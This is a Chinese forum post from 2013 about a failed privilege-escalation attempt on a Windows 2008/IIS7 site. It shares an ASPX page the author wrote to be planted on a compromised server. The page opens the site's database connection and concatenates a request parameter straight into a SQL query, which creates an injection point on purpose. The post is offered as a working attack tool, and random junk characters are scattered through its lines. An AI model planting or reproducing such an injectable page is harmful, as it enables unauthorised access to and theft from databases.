昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。% R* V7 T9 G3 _! f# @
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
8 |, [* }, x/ X% F* q+ o) y9 `( [' F代码量不多,自己写个拉倒了。烦死了。7 Z$ J* X6 Z( p5 u
0 H# s5 O8 o' m" K2 N$ P9 x+ G, Z/ t/ r/ H/ z
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
9 t( t' L! h8 u. l$ @9 F5 s9 ]<html xmlns="http://www.w3.org/1999/xhtml">
`! I/ A) [# x4 X8 o* x<head runat="server">
" ?% o3 S: w+ a- } <title>暗影aspx构造注射专用页面</title>
; c* f# d, M4 ^+ H5 [</head>/ S `; \& x4 i1 I) P
<body>
2 J' Z* Z9 @' f! N: k <form id="form1" runat="server">
2 C* K3 y6 v5 {* ^$ f9 ^: I <div>
! l% Z( l4 W/ G9 c. Z" d/ @1 Z5 \ <script language="c#" runat="server">
0 O7 G/ I) W4 m$ q6 y% v % s* r4 V! L! ~: m/ f( _3 z
void page_init(object sender, EventArgs e), f; v! K0 ^7 I4 N8 O
{
; _/ `; T( [& X* W. z8 Q$ b& K
7 d3 C" r; Z. V% g0 j+ G; R System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
2 C' R; a- R/ K 7 {# Q1 |4 {2 T/ m1 q
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
" O8 k* D6 S9 U conn.Open();
. _+ }! S' W& s& w: n
% H! M0 G; t1 G% {2 L& d' d string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1$ ?0 k" c9 f, z7 S& V, L
2 |/ c- N* P4 T$ u) [ {' T" S$ ] System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
# ^0 i* O- X) J* r int x = command.ExecuteNonQuery();9 v- F/ r* J9 D0 {
Response.Write(i+"\n");
* ]6 i5 \9 l9 L0 F Response.Write(x);
) X$ |! j0 P( }& W$ q conn.Close();+ v/ f3 H; l/ f R9 S
}+ I' Q9 r3 ?# ^7 J5 @. g/ n$ [2 X) V
+ G. c1 E! o4 T; Q8 S6 O* { </script>. p/ y; \7 B# K
</div>, m3 C' ^( G G9 c5 f
</form>" Q. F- A0 ]( T7 F" I" a
</body>2 o; A3 N4 B) E
</html>' [+ d5 h% O% i6 }& U# r* F
|
发表于 2013-3-20 21:32:01
收藏
支持
反对